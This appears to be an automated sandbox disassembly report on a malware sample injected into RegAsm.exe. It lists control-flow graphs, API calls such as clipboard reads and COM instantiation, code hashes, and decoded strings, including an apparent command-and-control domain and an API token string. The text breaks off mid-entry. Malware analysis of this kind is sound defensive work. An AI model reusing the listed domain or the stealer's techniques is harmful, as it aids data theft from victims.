                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: }D$%sgh$4`[b${D
                                                                  • API String ID: 0-1200795032
                                                                  • Opcode ID: c656611d13eb9998dea93ad7650dcc7234f5517edaf0b7581130130a8e452fc2
                                                                  • Instruction ID: e9ff087d7b6ba292c07e2a373faf3cf3d0a9800b043d4ee0ae862f7c510f9595
                                                                  • Opcode Fuzzy Hash: c656611d13eb9998dea93ad7650dcc7234f5517edaf0b7581130130a8e452fc2
                                                                  • Instruction Fuzzy Hash: 05817A7060C3419FE710EF28D890A2EBBE5EB99315F148C6DF1C597262C739E891CB1A

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 518 4402a0-440308 519 44030a 518->519 520 44033b-440358 518->520 521 440310-440339 call 444070 519->521 525 440367-4403ce CoCreateInstance 520->525 526 44035f 520->526 521->520 525->525 525->526 526->525
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(0044ECE0,00000000,00000001,0044ECD0,00000000), ref: 004403C3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID: \
                                                                  • API String ID: 542301482-2967466578
                                                                  • Opcode ID: 55ca5ea74327c37230005dd96f40ed117402dd6aaa728eb66733fef909f1fa8b
                                                                  • Instruction ID: b06662f8561df98ad2529b26f2048e1b14c1b8c328a58212780cbbaa33de0264
                                                                  • Opcode Fuzzy Hash: 55ca5ea74327c37230005dd96f40ed117402dd6aaa728eb66733fef909f1fa8b
                                                                  • Instruction Fuzzy Hash: 493132B0068344EAE7108F15D885B0BBBE4BB82759F10091DF6C85A3A1C7B5D949CBAB

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 602 40f042-40f06d 603 40f094-40f0d0 602->603 604 40f06f 602->604 605 40f0d2 603->605 606 40f104-40f107 603->606 607 40f070-40f092 call 4117b0 604->607 608 40f0e0-40f102 call 411740 605->608 612 40f10b-40f11c call 445da0 606->612 607->603 608->606 616 40f340-40f34e 612->616 617 40f320-40f32b 612->617 618 40f123-40f125 612->618 619 40f3e4-40f863 612->619 620 40f3c8-40f3d4 612->620 621 40f12a-40f268 call 44a230 * 12 612->621 622 40f270-40f288 call 440df0 612->622 623 40f3b0-40f3b6 call 40fa20 612->623 624 40f390-40f392 612->624 625 40f355-40f363 612->625 626 40f396-40f39c 612->626 627 40f3b9-40f3bf call 40fa20 612->627 628 40f3db 612->628 616->617 616->619 616->620 616->624 616->625 616->626 616->628 617->616 617->617 617->619 617->620 617->622 617->623 617->624 617->625 617->626 617->627 617->628 635 40f866-40f86d 618->635 619->635 620->619 620->628 621->616 621->617 621->619 621->620 621->622 621->623 621->624 621->625 621->626 621->627 621->628 642 40f290-40f297 622->642 623->627 624->626 629 40f381-40f38f 625->629 630 40f365-40f368 625->630 626->617 626->619 626->620 626->623 626->628 627->620 628->619 629->624 640 40f370-40f37f 630->640 640->629 640->640 642->642 645 40f299-40f2a8 642->645 647 40f303-40f308 645->647 648 40f2aa-40f2af 645->648 647->617 650 40f2b0-40f2b3 648->650 652 40f300 650->652 653 40f2b5-40f2dd call 4115b0 650->653 652->647 659 40f2e7-40f2ec 653->659 660 40f2df-40f2e5 653->660 659->652 660->650 660->659
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: gutterydhowi.shop
                                                                  • API String ID: 0-3708922491
                                                                  • Opcode ID: ca4472624897f6057df6c8ffb23683dd2a6b038d4d54d03cf02992a55fdc48f7
                                                                  • Instruction ID: ef9271f13a37813059f82d7b2aef6f9b9132d2b5a11f53dfc547668204b89559
                                                                  • Opcode Fuzzy Hash: ca4472624897f6057df6c8ffb23683dd2a6b038d4d54d03cf02992a55fdc48f7
                                                                  • Instruction Fuzzy Hash: 6CA17DB6C14214DFDB109FA0EC915BEBBB1FB0A309F04047AE805BB362E7759914CB69

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 675 4476d0-447702 LdrInitializeThunk
                                                                  APIs
                                                                  • LdrInitializeThunk.NTDLL(0044B41F,?,00000004,?,?,00000018,?), ref: 004476FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                  • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                  • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                  • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 751 447e1b-447e2b call 445dc0 754 447e41-447ebf 751->754 755 447e2d 751->755 757 447ef6-447f02 754->757 758 447ec1 754->758 756 447e30-447e3f 755->756 756->754 756->756 759 447f04-447f0f 757->759 760 447f45-447f47 757->760 761 447ed0-447ef4 call 448a50 758->761 762 447f10-447f17 759->762 761->757 764 447f20-447f26 762->764 765 447f19-447f1c 762->765 764->760 768 447f28-447f3d call 4476d0 764->768 765->762 767 447f1e 765->767 767->760 770 447f42 768->770 770->760
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: eb829c1958d12e7b797e221f414fdc189eda3203ecedf078b9ad9c73e332691c
                                                                  • Instruction ID: cdf6f297f13441fe2925969da6b6994966f8396d0ae99224b9e918e95d5920a6
                                                                  • Opcode Fuzzy Hash: eb829c1958d12e7b797e221f414fdc189eda3203ecedf078b9ad9c73e332691c
                                                                  • Instruction Fuzzy Hash: 9B31A97180C3018BE714DF28C89072BB7F1EF95305F44596EF8C9A72A1E7399845CB9A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9e817c690497e3a4022a77811021909d7a50f1b1157406970a08b9050210e2fa
                                                                  • Instruction ID: 8bcc6fb386cb15c142638edae28a52624d13c148528c1f92ba7a2a6e1e143af4
                                                                  • Opcode Fuzzy Hash: 9e817c690497e3a4022a77811021909d7a50f1b1157406970a08b9050210e2fa
                                                                  • Instruction Fuzzy Hash: A7021036A08341CFD700DF28E89052EB7E1FB89312F194A7EE49487392D735E955CB86

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 582 444490-4444a1 583 444526-444529 582->583 584 444500 582->584 585 444520 582->585 586 444511-444517 582->586 587 444502-444505 582->587 588 44452c-444530 RtlFreeHeap 582->588 589 4444a8-4444bd 582->589 583->588 584->587 587->586 590 4444e6-4444f3 589->590 591 4444bf 589->591 590->584 592 4444c0-4444e4 call 4475d0 591->592 592->590
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(4B6A4902,00000000), ref: 00444530
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: 7303358f5359f19ca23f0687a22b433efaff00f6e34e09b9e2f94b9ea2ceaedc
                                                                  • Instruction ID: caa5a61c1fc6514fa69d27dc7abdf64d4e2d01bb00e12b800d78490065dd5173
                                                                  • Opcode Fuzzy Hash: 7303358f5359f19ca23f0687a22b433efaff00f6e34e09b9e2f94b9ea2ceaedc
                                                                  • Instruction Fuzzy Hash: 5A01803550C240DFD210AB18ED80A1ABBF8EF8A716F054868E5C48B252C335EC50DB6A

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 595 4403d5-44041b 596 44041d-44041f 595->596 597 44044b-440473 SysAllocString 595->597 598 440420-440449 call 4440e0 596->598 599 440477-44047c 597->599 598->597
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocString
                                                                  • String ID:
                                                                  • API String ID: 2525500382-0
                                                                  • Opcode ID: 9b0a8c760725dab51bb07f8fe1f7641837ddde63911a500a21b14bce7a5731d5
                                                                  • Instruction ID: e00fa1a8639580132ef1711e3684ec2b9ae092d3da14727c041d79fce7bdfa61
                                                                  • Opcode Fuzzy Hash: 9b0a8c760725dab51bb07f8fe1f7641837ddde63911a500a21b14bce7a5731d5
                                                                  • Instruction Fuzzy Hash: F711EEB4118341ABE340CF55D884A1FBBF4BB8A399F50991CF5C8AB262C338D9558F5A

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 676 440487-4404a1 CoSetProxyBlanket
                                                                  APIs
                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00440499
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: BlanketProxy
                                                                  • String ID:
                                                                  • API String ID: 3890896728-0
                                                                  • Opcode ID: 51e336faa6c2fcf0526d47f5133575ed9351b5fc03324903f609139a39d83779
                                                                  • Instruction ID: 9f20bccf4d9f2d96555a164169547896cadea5661c106c8d5462967b84e22707
                                                                  • Opcode Fuzzy Hash: 51e336faa6c2fcf0526d47f5133575ed9351b5fc03324903f609139a39d83779
                                                                  • Instruction Fuzzy Hash: 34D002343D4301BAF2310B54AC17F157554A746F02F200025B7517C0E1C9E1A6519A1D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !>?$ z%$()&'$(qM$,-*+$0$01NO$4523$<=:;$@A^_$DEBC$HIFG$HKJM$LMJK$ONIH$PQno$XYVW$[ZED$\]Z[$dgfi$turs$xyvw$x{z}
                                                                  • API String ID: 0-2038966068
                                                                  • Opcode ID: 6fb4cebedaccea11462cfd2a12e62bc392f0dfae58938a905a7cddfeef1e6118
                                                                  • Instruction ID: dd8c9a11170efe247047064befbb3e8e17caaf51c98d00186aa99d3ab3198a48
                                                                  • Opcode Fuzzy Hash: 6fb4cebedaccea11462cfd2a12e62bc392f0dfae58938a905a7cddfeef1e6118
                                                                  • Instruction Fuzzy Hash: F2A2ABB55083819FD730CF11D884BEBBBE1AFC5304F54492EE9C88B251DB399885CB9A
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                  • String ID: F$G$H$N$S$s$u$z${$|$}
                                                                  • API String ID: 2832541153-1941974359
                                                                  • Opcode ID: c2f3d5519ab13067e96e8a8e1554d226321cbd2039ebb6754a01b94ca404930a
                                                                  • Instruction ID: 1a35188d04eb71108be36436a893f0745e74d17b360d7727ff600e0e31ba3cd0
                                                                  • Opcode Fuzzy Hash: c2f3d5519ab13067e96e8a8e1554d226321cbd2039ebb6754a01b94ca404930a
                                                                  • Instruction Fuzzy Hash: B341617150C3808ED301EF78D48831FBFE0AB96318F05596EE4DA86292D6BD8949C79B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .,$37$53$9)$<&$<:$MI$O=|?$Q%e'$TW$[Y$`a$n)l+$sAuC$#!$/-$31$75$sq
                                                                  • API String ID: 0-518734598
                                                                  • Opcode ID: b3b08317d2e0cfa541fc023eb25e697968bc4af5299184a1130a56b36b739f48
                                                                  • Instruction ID: 03ea407fed1d32f28916693174b9482451e2888c3307ff2ead53aff0a4ec171c
                                                                  • Opcode Fuzzy Hash: b3b08317d2e0cfa541fc023eb25e697968bc4af5299184a1130a56b36b739f48
                                                                  • Instruction Fuzzy Hash: D362D6B55093828AE3748F01E680BDFBBF1BB96344F90892DE5D89B241DB748449CF97
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ,"@$#6C$%W U$::$VVOT$[X^"$vT^:$xdaa$SQ
                                                                  • API String ID: 0-3977809258
                                                                  • Opcode ID: 687946c3e46dcd2fef14dd3dc931c1ff83cc1edd7a341014e5edc793b6e60020
                                                                  • Instruction ID: 6a30e320bc9aa03169a315c8e403c78acd1a2c3e87340e59c740f6ce2ae395c4
                                                                  • Opcode Fuzzy Hash: 687946c3e46dcd2fef14dd3dc931c1ff83cc1edd7a341014e5edc793b6e60020
                                                                  • Instruction Fuzzy Hash: 06827A70405B818AE7318F25C590BA3BBF0AF1B306F14189ED4EB9B293D739A545CF69
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $ $$8r?$--',$nLv($u}|
                                                                  • API String ID: 0-457197051
                                                                  • Opcode ID: 89f28bd8366341feae83dd6fb5c22f02944d18e81172c0eac4edd031de949ed1
                                                                  • Instruction ID: 8b41d4da4bcd42269ea7739c650f07c77f5b2283e083b4b23c58f1815274c948
                                                                  • Opcode Fuzzy Hash: 89f28bd8366341feae83dd6fb5c22f02944d18e81172c0eac4edd031de949ed1
                                                                  • Instruction Fuzzy Hash: 9352CF70504B418BE7258F35C494BA7BBE1AF4A305F14886EE5EB8B392CB3AF405CB55
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID: drG$)FC$?*$2$CIBH${vry
                                                                  • API String ID: 3664257935-1492907507
                                                                  • Opcode ID: 76d7692e372014387e47a71721219990899b7678fcf2bf8cf459b591c2ce3725
                                                                  • Instruction ID: ae17b6820417c1f5d865f6f8db41105b67f97988771920ed6e8cdea7b43e7d9c
                                                                  • Opcode Fuzzy Hash: 76d7692e372014387e47a71721219990899b7678fcf2bf8cf459b591c2ce3725
                                                                  • Instruction Fuzzy Hash: 87A28B70405B818AE7328F35C590BE3BBF1AF1A305F04589ED4EA9B282DB3AB545CB55
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$A$gfff$gfff$gfff
                                                                  • API String ID: 0-947532036
                                                                  • Opcode ID: e06ab667e6b9483aab09583229f0419af3f4093797c2ed4d09b53c95b9789ffe
                                                                  • Instruction ID: 21de5e691bd859abbc2be4e82a4dcaafefefd4727c911ae8c5553d0c2646aee4
                                                                  • Opcode Fuzzy Hash: e06ab667e6b9483aab09583229f0419af3f4093797c2ed4d09b53c95b9789ffe
                                                                  • Instruction Fuzzy Hash: 4EE2D2716083418FD714CF29C49476BBBE2ABC9314F188A3EE895A73D1D379DA05CB86
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0ALx9as21P0wgnMaAwgr5eEZBUx4ljqDx7xZ1jR49JI-1727448433-0.0.1.1-/api$J<BJ$v{${3$~
                                                                  • API String ID: 0-4147522767
                                                                  • Opcode ID: 76f2aed4a057638f363fd031f3dbe0569a69028984208c497ec39f2097cc7ed5
                                                                  • Instruction ID: 4e670058078cea7fd43884a886fc8be73a26d202e8482742903b49392826d215
                                                                  • Opcode Fuzzy Hash: 76f2aed4a057638f363fd031f3dbe0569a69028984208c497ec39f2097cc7ed5
                                                                  • Instruction Fuzzy Hash: 53D1687050C3818BD321DF18C49062EBBE1AF92744F54093EE5D1AB7A2D339D949CBAB
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MetricsSystem
                                                                  • String ID:
                                                                  • API String ID: 4116985748-3916222277
                                                                  • Opcode ID: 6d15c560a22f2f746b61e91c69fede85cce94a29c4e560c9bab8bff2291995dd
                                                                  • Instruction ID: 04cec409040a24a7638083f5cbef6eeda66da4d91f8b2fb747c19da65d0b6118
                                                                  • Opcode Fuzzy Hash: 6d15c560a22f2f746b61e91c69fede85cce94a29c4e560c9bab8bff2291995dd
                                                                  • Instruction Fuzzy Hash: 62319FB49182009FDB00EF68D98565EBBF0BB89304F11853EE898D7360D774A959CF86
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ,"@$#6C$%W U$::$VVOT$[X^"$vT^:$xdaa$SQ
                                                                  • API String ID: 0-3977809258
                                                                  • Opcode ID: 5316a4421e8038fc09d359bae9942a20de967b06b3305538db8130970f2136b8
                                                                  • Instruction ID: 47a7bdd0108c2fb9dd8588cd9d3ff781ee98881393f00aa1a63237223b76b1bc
                                                                  • Opcode Fuzzy Hash: 5316a4421e8038fc09d359bae9942a20de967b06b3305538db8130970f2136b8
                                                                  • Instruction Fuzzy Hash: 4A615B70005B808AE7718F34C494BE7BBE0BF1A306F44589ED4EA9B292DB3AA505CF55
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b$4`[b$D
                                                                  • API String ID: 0-2855741908
                                                                  • Opcode ID: a7e3d1d7ca71022d09922b4ef272221b09d855bf3f0e3213e81620edfcfd55d1
                                                                  • Instruction ID: 31d3bb4f6c8ef88d8f7c367f3412f89acc0e11c248f3c087f24487996a868f02
                                                                  • Opcode Fuzzy Hash: a7e3d1d7ca71022d09922b4ef272221b09d855bf3f0e3213e81620edfcfd55d1
                                                                  • Instruction Fuzzy Hash: 5DE1BBB0608381DFD720CF24E895BABB7E2FF85305F54496EE4889B352D3799850CB5A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b$`cb]$hi
                                                                  • API String ID: 0-188674353
                                                                  • Opcode ID: 7c7ddaada45d9b960d0eaf75562d5b09a578a319d4a1213e9501c45daf7a36b6
                                                                  • Instruction ID: e8b149cf807d1c003d5c69b0e71323098e2fb5bb7a12dbfc9662ce51d29e78b9
                                                                  • Opcode Fuzzy Hash: 7c7ddaada45d9b960d0eaf75562d5b09a578a319d4a1213e9501c45daf7a36b6
                                                                  • Instruction Fuzzy Hash: FDC1BE7160C3209BD710EF18E881A2BB7E4EF96354F84095EF8C597351E339E954C7AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: |}$IO$M"C
                                                                  • API String ID: 0-2140647755
                                                                  • Opcode ID: a38601d3fca04be0643588d29395e0164f5203bdcff9d00cb4cb4415e9c9f1d7
                                                                  • Instruction ID: 95a8a3ba117dcb61b299199237c9eeeb104e0e6ef4a4d217e90056a207d5ce29
                                                                  • Opcode Fuzzy Hash: a38601d3fca04be0643588d29395e0164f5203bdcff9d00cb4cb4415e9c9f1d7
                                                                  • Instruction Fuzzy Hash: A7E1ACB5D00269DBDF04CFD4E881AEEBBB1BF06304F640859E850AB346D3759A45CBA9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ((*$4`[b$KJML
                                                                  • API String ID: 0-1972290462
                                                                  • Opcode ID: 85170ad6c301ac33b82bc9fa6970ddb97d6213decdd9db29ee1bd33b2223b23e
                                                                  • Instruction ID: fe7f7a316f197fe0042526b9999b7c3ec2d399551d2672056d428c2cb04b8ed6
                                                                  • Opcode Fuzzy Hash: 85170ad6c301ac33b82bc9fa6970ddb97d6213decdd9db29ee1bd33b2223b23e
                                                                  • Instruction Fuzzy Hash: ADC10371E00205CFDF09CFA8D851BAEBBB2EF4A305F248269E415B7392D7399945CB58
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: fL[D$wcjn
                                                                  • API String ID: 0-3212404223
                                                                  • Opcode ID: f7381f910d54b45702fc34180e1fe2687b4c52f9d4af3e67fb7e363e571e8373
                                                                  • Instruction ID: f42574bc615607f6af951fa0bda80222cba276cb5f891ef9b4a55e7d3f85a151
                                                                  • Opcode Fuzzy Hash: f7381f910d54b45702fc34180e1fe2687b4c52f9d4af3e67fb7e363e571e8373
                                                                  • Instruction Fuzzy Hash: CF029C75608350ABD311EF25E841B2FBBE4AF95308F44492EF5C897262D239E914CB9B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: KJML$w
                                                                  • API String ID: 2994545307-3028343826
                                                                  • Opcode ID: bd99757a9c63034eb64c56ddee33b2aa73c3b09942c8a762cdb718a48a13f839
                                                                  • Instruction ID: 080b7696ce438855e2865b836230b873bea6a0c21e24f15a690f1c4f281cc9ae
                                                                  • Opcode Fuzzy Hash: bd99757a9c63034eb64c56ddee33b2aa73c3b09942c8a762cdb718a48a13f839
                                                                  • Instruction Fuzzy Hash: B0B101706083118BE714DF25E881B2FBBE1EF96314F54492EE5C997352E339E844CB9A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b$4`[b
                                                                  • API String ID: 0-3640500014
                                                                  • Opcode ID: d015d15252007465af4dfc1d6674f062de2066a95aacb490fbb4145584b27ade
                                                                  • Instruction ID: 4a5db5bc531862a3fafa49679c1da16283dda6f39ad5b5a5d790b33b14943aa6
                                                                  • Opcode Fuzzy Hash: d015d15252007465af4dfc1d6674f062de2066a95aacb490fbb4145584b27ade
                                                                  • Instruction Fuzzy Hash: 3081D3B160C3409BE710DF65E981B2FB7E5EB85709F04482DF6C487252D739E824CB6A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: f
                                                                  • API String ID: 0-1993550816
                                                                  • Opcode ID: ecde4e0f9d81017bb06cdb8f77f06a8ed7ff8d5b70e0e7afd6763affab39131a
                                                                  • Instruction ID: 69f14e0446ed55d0bc363b11fecc12665fd0227c7f6396fa499844b82b808001
                                                                  • Opcode Fuzzy Hash: ecde4e0f9d81017bb06cdb8f77f06a8ed7ff8d5b70e0e7afd6763affab39131a
                                                                  • Instruction Fuzzy Hash: 5D32AF716087419FEB14CF18C880B2FBBE1ABC8354F58892EF895973A2D778D845CB56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: p9A
                                                                  • API String ID: 0-2767146494
                                                                  • Opcode ID: cc4438e265543dc60c17e4af3816322dfc04a26b990f0c8e12e52939bdc12f3d
                                                                  • Instruction ID: 2c8aa80ce659a15c762eb3e1e81ca8c73c00eafc5f89e39574f9bbbba22e0185
